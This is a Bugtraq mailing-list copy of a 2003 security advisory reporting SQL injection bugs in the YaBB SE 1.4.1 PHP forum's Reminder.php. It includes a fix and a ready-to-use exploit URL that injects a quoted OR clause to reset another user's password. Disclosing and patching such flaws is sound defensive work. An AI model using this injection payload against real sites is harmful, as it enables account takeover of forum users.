[28485] in bugtraq
[VSA0306] YABBSE 1.4.1 SQL Injection Bugs
daemon@ATHENA.MIT.EDU (VOID.AT Security)
Mon Jan 20 19:16:51 2003
Date: Sat, 11 Jan 2003 01:31:05 +0100
From: "VOID.AT Security" <crew@void.at>
To: bugtraq@securityfocus.com
Message-ID: <20030111003105.GA9487@moon.void.at>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="cWoXeonUoKmBZSoM"
Content-Disposition: inline
--cWoXeonUoKmBZSoM
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
--cWoXeonUoKmBZSoM
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="VSA0306_yabbse.txt"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Subject: [void.at SA] YaBB SE SQL Injection Bugs
[void.at Security Advisory VSA0306]
YaBB SE is a web based forum written in PHP.
Overview
- --------
Due to sql injection bugs, it is possible for an remote
user without an account to get access to user accounts by
resetting or excplicit setting a password
Affected Versions
- -----------------
1.4.1
possibly others
Details
- -------
see Reminder.php
Solution
- --------
To fix this bug enable magic_rpc in your php.ini or
filter the user input for special characters
Exploit
- -------
There are two ways to exploit this vulnerability
* Reset User Password Vulnerability
http://www.myserver.com/yabbse/Reminder.php?searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername]
* Set Any User Password Vulnerability
You can only set the Password for user that has been added after your account,
because of the SQL structure.
Discovered by
- - -------------
crew@void.at
Credits
- -------
void.at
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iEYEARECAAYFAj4fZQkACgkQzxi8qAgTjUOM+gCfRbRObKdDQ155OmG7rkGc1HNM
nn4AoJDBOElOqbKSA2MJJ5R/AqhnyVJm
=3q3M
-----END PGP SIGNATURE-----
--cWoXeonUoKmBZSoM--
